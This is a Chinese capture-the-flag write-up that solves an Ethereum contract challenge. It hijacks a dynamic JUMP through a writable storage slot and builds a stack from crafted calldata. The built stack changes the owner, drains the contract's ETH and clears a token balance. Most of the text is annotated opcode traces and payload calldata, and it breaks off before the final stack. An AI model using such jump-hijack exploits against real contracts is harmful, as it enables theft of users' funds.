本题的核心思想跟之前做过的一道题目:Consensys CTF-02 栈溢出重定向利用的核心思想一致,即找到合约中的一个入口函数,通过该函数可以手动的构造一个栈。在手动构造的栈中,按照函数调用的顺序,将所需要的参数依次放入手动构造的栈里,然后依次调用所需的函数。最后找到一个出口,一般是一个jump Destination,结束调用。
本题的核心思想跟之前做过的一道题目:Consensys CTF-02 栈溢出重定向利用的核心思想一致,即找到合约中的一个入口函数,通过该函数可以手动的构造一个栈。在手动构造的栈中,按照函数调用的顺序,将所需要的参数依次放入手动构造的栈里,然后依次调用所需的函数。最后找到一个出口,一般是一个jump Destination,结束调用。
本文参考链接如下:https://www.youtube.com/embed/OYs-2Vqvdow
首先分析下Setup合约中,要解决本题的要求是什么:

function isSolved() public view returns (bool) {
return challenge.owner() == 0xdeaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD &&
challenge.balanceOf(address(this)) == 0 &&
address(challenge).balance == 0;
}
简单来看,需要让合约同时满足三个条件:1. 改变合约的owner为给定值,2. 清空合约的所有ETH,3. 清空合约中关于setup的状态。
由于challenge合约是不开源的,只提供了二进制代码,故为方便调试,我们首先需要部署一个challenge合约:

pragma solidity ^0.7.0;
import "./Setup.sol";
contract Hack {
ChallengeInterface public challenge;
constructor() public payable {
require(msg.value == 50 ether);
address addr;
bytes memory data = hex'0x6080...6170';
assembly{
addr := create(0,add(data,0x20),mload(data))
}
require(addr != address(0), "Hack/constructor failed to create contract");
challenge = ChallengeInterface(addr);
challenge.buyTokens{value: msg.value}();
}
}
将编译后的二进制代码通过网站Online Solidity Decompiler (ethervm.io)反编译得到OPCODE代码,浏览反编译得到的代码: 在buyTokens
方法中,有一个非常有趣的注解:==Error: Could not resolve jump destination!== 这通常是由于Jump的地址不是预先写好在代码中,而是动态计算得到的。

else if (var0 == 0xd0febe4c) {
// Dispatch table entry for buyTokens()
var1 = 0x0774;
var2 = 0x0ed0;
if (msg.sender == storage[0x05] / 0x0100 ** 0x01 & 0xffffffffffffffffffffffffffffffffffffffff) {
label_1CB2:
if (tx.gasprice < 0x2e90edd000) {
var3 = 0x1d39;
var4 = msg.value;
// Error: Could not resolve jump destination!
}
=>
function buyTokens() public payable{
address owner;
assembly{
owner := sload(0x05)
}
require(owner == msg.sender);
uint gasPrice_;
assembly{
gasPrice_ := gasprice()
}
if (gasPrice_ < 0x2e90edd000) {
bytes4 nextFunc;
assembly{
nextFunc := and(0xffffffff,and(0xffffffffffffffff,sload(0x0b)))
//跳转时,nextFunc函数的参数为msg.value, 返回位点为0x1d39
jump(nextFunc)
}
}
}
下面我们再进一步跳转到label_1CB2函数中,看下它具体的执行逻辑:可以看到label_1D0F的跳转地址是存储在0x0b的storage中。如果我们能够向0x0b的插槽写值,则我们可以控制它跳转到任何我们想要去的地方。
label_1CB2: 1CB2 5B JUMPDEST 1CB3 64 PUSH5 0x2e90edd000 1CB9 3A GASPRICE 1CBA 10 LT 1CBB 61 PUSH2 0x1d0f 1CBE 57 *JUMPI label_1D0F: // Incoming jump from 0x1CBE, if tx.gasprice < 0x2e90edd000 // Inputs[2] // { // @1D13 msg.value // @1D19 storage[0x0b] // } 1D0F 5B JUMPDEST 1D10 61 PUSH2 0x1d39 0x1d39 1D13 34 CALLVALUE 0x1d39 value 1D14 60 PUSH1 0x0b 0x1d39 value 0x0b 1D16 60 PUSH1 0x00 0x1d39 value 0x0b 0x00 1D18 90 SWAP1 0x1d39 value 0x00 0x0b 1D19 54 SLOAD 0x1d39 value 0x00 s[0x0b] 1D1A 90 SWAP1 0x1d39 value s[0x0b] 0x00 1D1B 61 PUSH2 0x0100 0x1d39 value s[0x0b] 0x00 0x0100 1D1E 0A EXP 0x1d39 value s[0x0b] 1 1D1F 90 SWAP1 0x1d39 value 1 s[0x0b] 1D20 04 DIV 0x1d39 value s[0x0b] 1D21 80 DUP1 0x1d39 value s[0x0b] s[0x0b] 1D22 15 ISZERO 0x1d39 value s[0x0b] 0 1D23 61 PUSH2 0x1f51 0x1d39 value s[0x0b] 0 0x1f51 1D26 02 MUL 0x1d39 value s[0x0b] 0 1D27 17 OR 0x1d39 value s[0x0b] 1D28 67 PUSH8 0xffffffffffffffff 0x1d39 value s[0x0b] 0xff.. 1D31 16 AND 0x1d39 value s[0x0b][:8] 1D32 63 PUSH4 0xffffffff value s[0x0b] 0x1d39 value s[0x0b] 0xff.. 1D37 16 AND 0x1d39 value s[0x0b][:4] 1D38 56 *JUMP 0x1d39 value function 1D0F() internal payable { bytes4 nextFunc; assembly{ nextFunc := and(0xffffffff,and(0xffffffffffffffff,sload(0x0b))) //跳转时,nextFunc函数的参数为msg.value, 返回位点为0x1d39 jump(nextFunc) } }
接下来,我们需要找到能够写入storage[0x0b]
的方法,我们发现方法func_0350
可以写入storage[0x0b]
,但它是一个internal方法,无法被我们调用。于是我们再找到对应的external方法:0x27f83350

function func_0350(var arg0, var arg1) {
arg0 = msg.data[arg0:arg0 + 0x20];
storage[0x0b] = arg0;
}
=>
function func_0350(uint arg) internal{
uint256 v = arg;
assembly{
sstore(0x0b, v)
}
}
这样我们就找到了函数0x27f83350
, 从函数中可以看到,0x27f83350
是一个non-payable函数,接受ETH, 以及一个长度为0x20的参数,并将该参数写入storage[0x0b]中。

function 0x27f83350 public{
var1 = msg.value;
if (var1) { revert(memory[0x00:0x00]); }
var1 = 0x0366;
var2 = 0x04;
var3 = msg.data.length - var2;
if (var3 < 0x20) { revert(memory[0x00:0x00]); }
func_0350(var2, var3);
stop();
}
=>
function 0x27f83350(uint arg) public nonPayable{
require(msg.value == 0);
uint256 v = arg;
assembly{
sstore(0x0b, v)
}
}
此时,我们可以通过0x27f83350
函数设置0x0b插槽中的值,然后通过调用buyTokens
函数进入,根据插槽0x0b的值从而跳转到任何我们想要跳转的位置
此时,关键是分析我们需要跳转到哪个位置来构造所需要的堆栈。
首先我们需要继续分析下1D0F()的跳转,从上面的分析可以看到,它跳转时会带一个参数msg.value过去到nextFunc中,然后nextFunc会跳转回0x1d39。此时需要关注一点,nextFunc的返回值在栈里如何排序?nextFunc的返回值必定在0x1d39下方,因为这样才可以Jump到0x1d39实现函数返回。

LABEL 1D39:
1D39 5B JUMPDEST
1D3A 56 *JUMP
简单来讲,当函数跳转到1D39后,又会马上按照此时的栈首位进行跳转。故nextFunc函数必须要有返回值,且函数参数只能有一个,即msg.value.
此时我们查看反编译的代码发现, 如下6个函数都满足。但此时我们需要进一步思考,nextFunc的返回值肯定是越多越好,故我们首先查看func_19FC
saleHardcap(arg0) returns (r0) sellRate(arg0) returns (r0) nextOwner(arg0) returns (r0) owner(arg0) returns (r0) saleCount(arg0) returns (r0) func_19FC(arg0) returns (r0, r1, r2, r3)

function func_19FC(var arg0) returns (var r0, var arg0, var r2, var r3) {
r2 = 0x00;
r3 = r2;
var var2 = 0x00;
var var3 = var2;
var temp0 = arg0;
var var4 = msg.data[temp0:temp0 + 0x20];
var var5 = msg.data[temp0 + 0x20:temp0 + 0x20 + 0x20];
var var6 = msg.data[temp0 + 0x40:temp0 + 0x40 + 0x20];
var var7 = msg.data[temp0 + 0x60:temp0 + 0x60 + 0x20];
if (var5 <= 0x00 << 0x00) {
var temp11 = memory[0x40:0x60];
memory[temp11:temp11 + 0x20] = 0x08c379a000000000000000000000000000000000000000000000000000000000;
var temp12 = temp11 + 0x04;
var temp13 = temp12 + 0x20;
memory[temp12:temp12 + 0x20] = temp13 - temp12;
memory[temp13:temp13 + 0x20] = 0x12;
var temp14 = temp13 + 0x20;
memory[temp14:temp14 + 0x20] = 0x736967436865636b2f722d69732d7a65726f0000000000000000000000000000;
var temp15 = memory[0x40:0x60];
revert(memory[temp15:temp15 + (temp14 + 0x20) - temp15]);
} else if (var6 <= 0x00 << 0x00) {
var temp6 = memory[0x40:0x60];
memory[temp6:temp6 + 0x20] = 0x08c379a000000000000000000000000000000000000000000000000000000000;
var temp7 = temp6 + 0x04;
var temp8 = temp7 + 0x20;
memory[temp7:temp7 + 0x20] = temp8 - temp7;
memory[temp8:temp8 + 0x20] = 0x12;
var temp9 = temp8 + 0x20;
memory[temp9:temp9 + 0x20] = 0x736967436865636b2f732d69732d7a65726f0000000000000000000000000000;
var temp10 = memory[0x40:0x60];
revert(memory[temp10:temp10 + (temp9 + 0x20) - temp10]);
} else if (var6 > 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0 << 0x00) {
var temp1 = memory[0x40:0x60];
memory[temp1:temp1 + 0x20] = 0x08c379a000000000000000000000000000000000000000000000000000000000;
var temp2 = temp1 + 0x04;
var temp3 = temp2 + 0x20;
memory[temp2:temp2 + 0x20] = temp3 - temp2;
memory[temp3:temp3 + 0x20] = 0x12;
var temp4 = temp3 + 0x20;
memory[temp4:temp4 + 0x20] = 0x736967436865636b2f6d616c6c6561626c650000000000000000000000000000;
var temp5 = memory[0x40:0x60];
revert(memory[temp5:temp5 + (temp4 + 0x20) - temp5]);
} else if (var7 >= 0x1b) {
r3 = var7;
arg0 = var5;
r2 = var6;
r0 = var4;
return r0, arg0, r2, r3;
} else {
r3 = var7 + 0x1b;
arg0 = var5;
r2 = var6;
r0 = var4;
return r0, arg0, r2, r3;
}
}
=>
function func_19fc(uint arg) internal returns(uint,uint,uint,uint) {
uint offset = arg;
uint var4;
uint var5;
uint var6;
uint var7;
assembly{
var4 := calldataload(offset)
var5 := calldataload(add(offset, 0x20))
var6 := calldataload(add(offset, 0x40))
var7 := calldataload(add(offset, 0x60))
}
if (var5 <= 0x00) {
assembly{
let temp11 := mload(0x40)
mstore(temp11,
0x08c379a000000000000000000000000000000000000000000000000000000000)
let temp12 := add(temp11, 0x04)
mstore(temp12, 0x20)
mstore(add(temp12,0x20),0x12)
mstore(add(temp12,0x40),
0x736967436865636b2f722d69732d7a65726f0000000000000000000000000000)
revert(temp11,0x64)
//0x08c379a0
//0000000000000000000000000000000000000000000000000000000000100000
//0000000000000000000000000000000000000000000000000000000000010010
//736967436865636b2f722d69732d7a65726f0000000000000000000000000000
}
} else if (var6 <= 0x00) {
与var5 <= 0一致
} else if(var6 > 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0){
与var5 <= 0一致
} else if (var7 >= 0x1b) {
return var4, offset, var6, var7;
} else {
return var4, var5, var6, var7+0x1b;
}
}
从上面的func_19FC函数我们分析得知:它会消耗一个参数,将这个参数用作calldata的offset量,然后从calldadta中拷贝4个uint32的值到栈空间中。当func_19FC函数调用返回时,LABEL 1D39会继续Jump,此时Jump的地址即为返回的第一个值。
由于我们的目标是构造一个栈,故我们可以反复调用func_19FC,让其返回的第一个值就是func_19FC的方法位点,返回的第二个值是func_19FC的方法参数。这样==每调用一次func_19FC我们就向栈里写入了两个值==,==且该值均来自于calldata==。这正是我们想要的。
即此时的calldata应该为:
0x00 d0febe4c //buyToken() 0x04 0000000000000000000000000000000000000000000000000000000000000004//offset 0x24 00000000000000000000000000000000000000000000000000000000000019FC//var4 = label_19FC 0x44 0000000000000000000000000000000000000000000000000000000000000084//var5 = next_offset 0x64 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff//var6 = payload1 0x84 000000000000000000000000000000000000000000000000000000000000001a//var7 = payload2
从上面的分析中,我们已经有能力去构造一个堆栈,但是堆栈中的内容应该如何去设计呢?
还是从Setup中的解题条件开始:
首先是查看:nextOwner()函数
发现该函数实际返回的是Storage[0x06]
的值,故需要去OPCODE中找到给Storage[0x06]
写值的函数:label_102A
label_102A: 102A 5B JUMPDEST jumpback deadbeaf 102B 80 DUP1 jumpback deadbeaf deadbeaf 102C 60 PUSH1 0x06 jumpback deadbeaf deadbeaf 0x06 102E 60 PUSH1 0x00 jumpback deadbeaf deadbeaf 0x06 0x00 1030 61 PUSH2 0x0100 jumpback deadbeaf deadbeaf 0x06 0x00 0x0100 1033 0A EXP jumpback deadbeaf deadbeaf 0x06 0x01 1034 81 DUP2 jumpback deadbeaf deadbeaf 0x06 0x01 0x06 1035 54 SLOAD jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 1036 81 DUP2 jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 0x01 1037 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 0x01 0xff 104C 02 MUL jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 0xff 104D 19 NOT jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 0x11..00 104E 16 AND jumpback deadbeaf deadbeaf 0x06 0x01 0 104F 90 SWAP1 jumpback deadbeaf deadbeaf 0x06 0 0x01 1050 83 DUP4 jumpback deadbeaf deadbeaf 0x06 0 0x01 deadbeaf 1051 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpback deadbeaf deadbeaf 0x06 0 0x01 deadbeaf 0xff 1066 16 AND jumpback deadbeaf deadbeaf 0x06 0 0x01 deadbeaf 1067 02 MUL jumpback deadbeaf deadbeaf 0x06 0 deadbeaf 1068 17 OR jumpback deadbeaf deadbeaf 0x06 deadbeaf 1069 90 SWAP1 jumpback deadbeaf deadbeaf deadbeaf 0x06 106A 55 SSTORE jumpback deadbeaf deadbeaf 106B 50 POP jumpback deadbeaf 106C 50 POP jumpback 106D 56 *JUMP => function label_102A(address deadbeaf, uint jumpback) internal { address deadbeaf_ = deadbeaf; uint jumpback_ = jumpback; assembly{ let newOwner := and(0xffffffffffffffffffffffffffffffffffffffff, deadbeaf_) sstore(0x06, deadbeaf) jump(jumpback) } }
故此时的calldata应该为:
0x00 d0febe4c //buyToken() 0x04 0000000000000000000000000000000000000000000000000000000000000004//offset 0x24 00000000000000000000000000000000000000000000000000000000000019FC//var4 = label_19FC 0x44 00000000000000000000000000000000000000000000000000000000000000a4//var5 = next_offset 0x64 000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf 0x84 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback
这里我们需要找到对应的jumpback
的值, 这里的值应该是191B
要清空所有的ETH则必须要有CALL这一个OPCODE,通过查找全文中的call OPCODE,我们发现label_191B
中存在这一个特征值。
label_191B: 191B 5B JUMPDEST address balance 191C 60 PUSH1 0x00 address balance 0x00 191E 82 DUP3 address balance 0x00 address 191F 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff address balance 0x00 address 0xff 1934 16 AND address balance 0x00 address 1935 82 DUP3 address balance 0x00 address balance 1936 60 PUSH1 0x40 address balance 0x00 address balance 0x40 1938 51 MLOAD address balance 0x00 address balance M[40] 1939 80 DUP1 address balance 0x00 address balance M[40] M[40] 193A 60 PUSH1 0x00 address balance 0x00 address balance M[40] M[40] 0x00 193C 01 ADD address balance 0x00 address balance M[40] M[40] 193D 90 SWAP1 address balance 0x00 address balance M[40] M[40] 193E 50 POP address balance 0x00 address balance M[40] 193F 60 PUSH1 0x00 address balance 0x00 address balance M[40] 0x00 1941 60 PUSH1 0x40 address balance 0x00 address balance M[40] 0x00 0x40 1943 51 MLOAD address balance 0x00 address balance M[40] 0x00 M[40] 1944 80 DUP1 address balance 0x00 address balance M[40] 0x00 M[40] M[40] 1945 83 DUP4 address balance 0x00 address balance M[40] 0x00 M[40] M[40] M[40] 1946 03 SUB address balance 0x00 address balance M[40] 0x00 M[40] 0 1947 81 DUP2 address balance 0x00 address balance M[40] 0x00 M[40] 0 M[40] 1948 85 DUP6 address balance 0x00 address balance M[40] 0x00 M[40] 0 M[40] balance 1949 87 DUP8 address balance 0x00 address balance M[40] 0x00 M[40] 0 M[40] balance address 194A 5A GAS address balance 0x00 address balance M[40] 0x00 M[40] 0 M[40] balance address gas 194B F1 CALL address balance 0x00 address balance M[40] 0x01 194C 92 SWAP3 address balance 0x00 0x01 balance M[40] address 194D 50 POP address balance 0x00 0x01 balance M[40] 194E 50 POP address balance 0x00 0x01 balance 194F 50 POP address balance 0x00 0x01 1950 3D RETURNDATASIZE address balance 0x00 0x01 rsize 1951 80 DUP1 address balance 0x00 0x01 rsize rsize 1952 60 PUSH1 0x00 address balance 0x00 0x01 rsize rsize 0x00 1954 81 DUP2 address balance 0x00 0x01 rsize rsize 0x00 rsize 1955 14 EQ address balance 0x00 0x01 rsize rsize 0x01 1956 61 PUSH2 0x197b address balance 0x00 0x01 rsize rsize 0x01 0x197b 1959 57 *JUMPI address balance 0x00 0x01 rsize rsize => function label_191B(address _addr, uint balance) internal { (bool success, ) = address(this).call{value:balance,to:_addr}(""); uint returndatasize_; assembly{ returndatasize_ := returndatasize() if eq(returndatasize_,0x00) { jump(0x197b) } } }
从上述分析可以知道,当跳转到label_191B
时,实际上调用了address(this).call{value:ether,to:addr}("")
方法,即将该合约地址上的所有ETH全部转移给了某一个addr地址。
此时的内存应为:
000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback 000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance 0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意
则此时的calldata应该为:
0x00 d0febe4c //buyToken() 0x04 0000000000000000000000000000000000000000000000000000000000000004//offset 0x24 00000000000000000000000000000000000000000000000000000000000019FC//var4 = label_19FC 0x44 00000000000000000000000000000000000000000000000000000000000000a4//var5 = next_offset 0x64 000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf 0x84 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback 0xa4 00000000000000000000000000000000000000000000000000000000000019FC//var4 = label_19FC 0xc4 0000000000000000000000000000000000000000000000000000000000000124//var5 = next_offset 0xe4 000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance = 50ether+4wei 0x104 0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意
注意到这里跳转到了一个固定的位点0x197b
,我们需要进入该位点查看下:
label_197B: 197B 5B JUMPDEST back7 back6 back5 back4 back3 back2 back1 197C 60 PUSH1 0x60 back7 back6 back5 back4 back3 back2 back1 0x60 197E 91 SWAP2 back7 back6 back5 back4 back3 0x60 back1 back2 197F 50 POP back7 back6 back5 back4 back3 0x60 back1 1980 5B JUMPDEST 1981 50 POP back7 back6 back5 back4 back3 0x60 1982 50 POP back7 back6 back5 back4 back3 1983 90 SWAP1 back7 back6 back5 back3 back4 1984 50 POP back7 back6 back5 back3 1985 80 DUP1 back7 back6 back5 back3 back3 1986 61 PUSH2 0x19f7 back7 back6 back5 back3 back3 0x19f7 1989 57 *JUMPI label_19F7: 19F7 5B JUMPDEST back7 back6 back5 back3 19F8 50 POP back7 back6 back5 19F9 50 POP back7 back6 19FA 50 POP back7 19FB 56 *JUMP
在这个位点中,pop了多个内存中的字段,所以我们需要按照要求将内存设计成满足它pop的结构,则此时的内存为:
000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback 000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance 0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意 0000000000000000000000000000000000000000000000000000000000000000//var6 = back1 0000000000000000000000000000000000000000000000000000000000000000//var7 = back2 0000000000000000000000000000000000000000000000000000000000000001//var6 = back3 0000000000000000000000000000000000000000000000000000000000000000//var7 = back4 0000000000000000000000000000000000000000000000000000000000000000//var6 = back5 0000000000000000000000000000000000000000000000000000000000000000//var7 = back6 0000000000000000000000000000000000000000000000000000000000001263//var6 = back7:下一个位点 0000000000000000000000000000000000000000000000000000000000000000//var7 = UNKNOW
因为是balance[address(setup)]的状态要清空,所以需要考虑到solidity中对于map的存储。简单来讲,合约中存储map会首先将该key的值与map对应的插槽点的值进行连接,成为一个64byte的值,然后调用keccak256取得哈希值,该哈希值即为该map中值所对应的插槽。故,需要清空balance[address(setup)]
我们只需要在整个OPCODE中搜索SHA3即可。注意不要写道allowance[owner][spender]
里面去了。
label_1563: 1563 5B JUMPDEST jumpBack x key y value 1564 60 PUSH1 0x00 jumpBack x key y value 0x00 1566 80 DUP1 jumpBack x key y value 0x00 0x00 1567 84 DUP5 jumpBack x key y value 0x00 0x00 key 1568 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpBack x key y value 0x00 0x00 key 0xff 157D 16 AND jumpBack x key y value 0x00 0x00 key 157E 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpBack x key y value 0x00 0x00 key 0xff 1593 16 AND jumpBack x key y value 0x00 0x00 key 1594 81 DUP2 jumpBack x key y value 0x00 0x00 key 0x00 1595 52 MSTORE jumpBack x key y value 0x00 0x00 1596 60 PUSH1 0x20 jumpBack x key y value 0x00 0x00 0x20 1598 01 ADD jumpBack x key y value 0x00 0x20 1599 90 SWAP1 jumpBack x key y value 0x20 0x00 159A 81 DUP2 jumpBack x key y value 0x20 0x00 0x20 159B 52 MSTORE jumpBack x key y value 0x20 159C 60 PUSH1 0x20 jumpBack x key y value 0x20 0x20 159E 01 ADD jumpBack x key y value 0x40 159F 60 PUSH1 0x00 jumpBack x key y value 0x40 0x00 15A1 20 SHA3 jumpBack x key y value hash 15A2 81 DUP2 jumpBack x key y value hash value 15A3 90 SWAP1 jumpBack x key y value value hash 15A4 55 SSTORE jumpBack x key y value 15A5 50 POP jumpBack x key y 15A6 81 DUP2 jumpBack x key y key 15A7 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpBack x key y key 0xff 15BC 16 AND jumpBack x key y key 15BD 83 DUP4 jumpBack x key y key x 15BE 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpBack x key y key x 0xff 15D3 16 AND jumpBack x key y key x 15D4 7F PUSH32 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef jumpBack x key y key x 0xddf 15F5 83 DUP4 jumpBack x key y key x 0xddf y 15F6 60 PUSH1 0x40 jumpBack x key y key x 0xddf y 0x40 15F8 51 MLOAD jumpBack x key y key x 0xddf y M[40] 15F9 80 DUP1 jumpBack x key y key x 0xddf y M[40] M[40] 15FA 82 DUP3 jumpBack x key y key x 0xddf y M[40] M[40] y 15FB 81 DUP2 jumpBack x key y key x 0xddf y M[40] M[40] y M[40] 15FC 52 MSTORE jumpBack x key y key x 0xddf y M[40] M[40] 15FD 60 PUSH1 0x20 jumpBack x key y key x 0xddf y M[40] M[40] 0x20 15FF 01 ADD jumpBack x key y key x 0xddf y M[40] M[40]+0x20 1600 91 SWAP2 jumpBack x key y key x 0xddf M[40]+0x20 M[40] y 1601 50 POP jumpBack x key y key x 0xddf M[40]+0x20 M[40] 1602 50 POP jumpBack x key y key x 0xddf M[40]+0x20 1603 60 PUSH1 0x40 jumpBack x key y key x 0xddf M[40]+0x20 0x40 1605 51 MLOAD jumpBack x key y key x 0xddf M[40]+0x20 M[40] 1606 80 DUP1 jumpBack x key y key x 0xddf M[40]+0x20 M[40] M[40] 1607 91 SWAP2 jumpBack x key y key x 0xddf M[40] M[40] M[40]+0x20 1608 03 SUB jumpBack x key y key x 0xddf M[40] 0x20 1609 90 SWAP1 jumpBack x key y key x 0xddf 0x20 M[40] 160A A3 LOG3 jumpBack x key y 160B 50 POP jumpBack x key 160C 50 POP jumpBack x 160D 50 POP jumpBack 160E 56 *JUMP => function label_1563(uint value,uint y, addr key, addr x, uint jumpBack) internal { balance[key] = value; uint k; assembly{ mstore(mload(0x40),y) k := mload(0x40) } emit label_1563_event(k,0x20,0xddf,x,key) assembly{ jump(jumpBack) } }
从上面的分析中,我们可以知道我们需要的栈应该是:
000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback 000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance 0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意 0000000000000000000000000000000000000000000000000000000000000000//var6 = back1 0000000000000000000000000000000000000000000000000000000000000000//var7 = back2 0000000000000000000000000000000000000000000000000000000000000001//var6 = back3 0000000000000000000000000000000000000000000000000000000000000000//var7 = back4 0000000000000000000000000000000000000000000000000000000000000000//var6 = back5 0000000000000000000000000000000000000000000000000000000000000000//var7 = back6 0000000000000000000000000000000000000000000000000000000000001563//var6 = back7:下一个位点 0000000000000000000000000000000000000000000000000000000000000000//var7 = value = 0 0000000000000000000000000000000000000000000000000000000000000000//var6 = y = 0 000000000000000000000000DA0bab807633f07f013f94DD0E6A4F96F8742B53//var7 = akey=address(setup) 0000000000000000000000000000000000000000000000000000000000000000//var6 = x = 0 0000000000000000000000000000000000000000000000000000000000000000//var7 = jumpBack
现在我们已经完成了条件2,3,针对条件1,我们在之前的分析中只是将0xdeadbeaf存入了slot[0x06]中,但是owner对应的插槽是slot[0x05]。这里我们找到0C4A
label_0C4A: 0C4A 5B JUMPDEST jumpBack 0C4B 60 PUSH1 0x06 jumpBack 0x06 0C4D 60 PUSH1 0x00 jumpBack 0x06 0x00 0C4F 90 SWAP1 jumpBack 0x00 0x06 0C50 54 SLOAD jumpBack 0x00 s[06] 0C51 90 SWAP1 jumpBack s[06] 0x00 0C52 61 PUSH2 0x0100 jumpBack s[06] 0x00 0x0100 0C55 0A EXP jumpBack s[06] 1 0C56 90 SWAP1 jumpBack 1 s[06] 0C57 04 DIV jumpBack s[06] 0C58 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpBack s[06] 0xff.. 0C6D 16 AND jumpBack s[06] 0C6E 60 PUSH1 0x05 jumpBack s[06] 0x05 0C70 60 PUSH1 0x01 jumpBack s[06] 0x05 0x01 0C72 61 PUSH2 0x0100 jumpBack s[06] 0x05 0x01 0x0100 0C75 0A EXP jumpBack s[06] 0x05 0x0100 0C76 81 DUP2 jumpBack s[06] 0x05 0x0100 0x05 0C77 54 SLOAD jumpBack s[06] 0x05 0x0100 s[05] 0C78 81 DUP2 jumpBack s[06] 0x05 0x0100 s[05] 0x0100 0C79 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpBack s[06] 0x05 0x0100 s[05] 0x0100 0xff.. 0C8E 02 MUL jumpBack s[06] 0x05 0x0100 s[05] 0xff..00 0C8F 19 NOT jumpBack s[06] 0x05 0x0100 s[05] 0x1111..ff 0C90 16 AND jumpBack s[06] 0x05 0x0100 s[05][:2] 0C91 90 SWAP1 jumpBack s[06] 0x05 s[05][:2] 0x0100 0C92 83 DUP4 jumpBack s[06] 0x05 s[05][:2] 0x0100 s[06] 0C93 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpBack s[06] 0x05 s[05][:2] 0x0100 s[06] 0xff 0CA8 16 AND jumpBack s[06] 0x05 s[05][:2] 0x0100 s[06] 0CA9 02 MUL jumpBack s[06] 0x05 s[05][:2] s[06]00 0CAA 17 OR jumpBack s[06] 0x05 s[06]xx 0CAB 90 SWAP1 jumpBack s[06] s[06]xx 0x05 0CAC 55 SSTORE jumpBack s[06] 0CAD 50 POP jumpBack 0CAE 60 PUSH1 0x00 jumpBack 0x00 0CB0 60 PUSH1 0x06 jumpBack 0x00 0x06 0CB2 60 PUSH1 0x00 jumpBack 0x00 0x06 0x00 0CB4 61 PUSH2 0x0100 jumpBack 0x00 0x06 0x00 0x0100 0CB7 0A EXP jumpBack 0x00 0x06 0x01 0CB8 81 DUP2 jumpBack 0x00 0x06 0x01 0x06 0CB9 54 SLOAD jumpBack 0x00 0x06 0x01 s[06] 0CBA 81 DUP2 jumpBack 0x00 0x06 0x01 s[06] 0x06 0CBB 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff jumpBack 0x00 0x06 0x01 s[06] 0x06 0xff 0CD0 02 MUL jumpBack 0x00 0x06 0x01 s[06] 0x06.. 0CD1 19 NOT jumpBack 0x00 0x06 0x01 s[06] 0xff06.. 0CD2 16 AND 0CD3 90 SWAP1 0CD4 83 DUP4 0CD5 73 PUSH20 0xffffffffffffffffffffffffffffffffffffffff 0CEA 16 AND 0CEB 02 MUL 0CEC 17 OR 0CED 90 SWAP1 0CEE 55 SSTORE 0CEF 50 POP 0CF0 56 *JUMP => function label_0C4A(uint jumpBack) internal { owner = newOwenr; assembly{ jump(jumpBack) } }
我们可以知道我们需要的栈应该是:
000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback 000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance 0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意 0000000000000000000000000000000000000000000000000000000000000000//var6 = back1 0000000000000000000000000000000000000000000000000000000000000000//var7 = back2 0000000000000000000000000000000000000000000000000000000000000001//var6 = back3 0000000000000000000000000000000000000000000000000000000000000000//var7 = back4 0000000000000000000000000000000000000000000000000000000000000000//var6 = back5 0000000000000000000000000000000000000000000000000000000000000000//var7 = back6 0000000000000000000000000000000000000000000000000000000000001563//var6 = back7:下一个位点 0000000000000000000000000000000000000000000000000000000000000000//var7 = value = 0 0000000000000000000000000000000000000000000000000000000000000000//var6 = y = 0 000000000000000000000000DA0bab807633f07f013f94DD0E6A4F96F8742B53//var7 = akey=address(setup) 0000000000000000000000000000000000000000000000000000000000000000//var6 = x = 0 0000000000000000000000000000000000000000000000000000000000000C4A//var7 = jumpBack 0000000000000000000000000000000000000000000000000000000000000000//var6 = exit 0000000000000000000000000000000000000000000000000000000000000C4A//var7 = UNKNOW
我们的堆栈在这里已经满足了所有的三个条件,现在需要执行完毕,退出。
label_0366: // Incoming return from call to 0x0350 at 0x034B 0366 5B JUMPDEST 0367 00 *STOP
故我们的堆栈最后为:
